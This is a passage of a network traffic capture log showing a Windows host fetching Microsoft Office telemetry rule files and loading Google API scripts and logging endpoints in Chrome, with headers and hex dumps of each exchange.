2024-11-02 16:56:36 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:36 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: fd0448d3-301e-0096-6779-2ce71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165636Z-r159446fcd7bn5c7hC1DFWbnyg00000001kg00000000cz8v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-02 16:56:36 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.7	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:36 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:36 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 2d5e3293-901e-002a-4f00-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165636Z-15869dbbcc6lq2lzhC1DFWsurc00000000s00000000082b0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-02 16:56:36 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49780	142.250.186.46	443	2324	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:36 UTC	729	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-02 16:56:37 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sat, 02 Nov 2024 07:55:44 GMT Expires: Sun, 02 Nov 2025 07:55:44 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 32452 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-02 16:56:37 UTC	463	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 Data Ascii: totype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retu
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 Data Ascii: ar b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.as
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 Data Ascii: function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 Data Ascii: promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=func
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f Data Ascii: or("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));fo
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 Data Ascii: r h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return t
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 Data Ascii: e=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 Data Ascii: pe.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)r
2024-11-02 16:56:37 UTC	1378	IN	Data Raw: 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 Data Ascii: +9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	49785	216.58.206.78	443	2324	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:37 UTC	714	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-02 16:56:37 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 30 35 36 36 35 39 35 30 39 32 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],373,[["1730566595092",null,null,null,
2024-11-02 16:56:37 UTC	936	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=518=t9pTUmMpuORiDFwGJAz07vyo7dMui2OJfxjFCiKP0xfdAPVzY2bzNAPI6-b3jbzzxDALa34MWfQ33SUl-yrvfnUXNfyyfQM26V5boQ-bfcxUB1RuRyO9Rk76lpsxhBWC1zJ-NEsjsO-q4PfAGcVzJJLIFXB3qGPHRL4uxBtxOZBEeAk0fw; expires=Sun, 04-May-2025 16:56:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Sat, 02 Nov 2024 16:56:37 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Sat, 02 Nov 2024 16:56:37 GMT Connection: close Transfer-Encoding: chunked
2024-11-02 16:56:37 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-02 16:56:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.7	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:37 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:37 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165637Z-16547b76f7fj897nhC1DFWdwq400000000r000000000f96s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:37 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.7	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
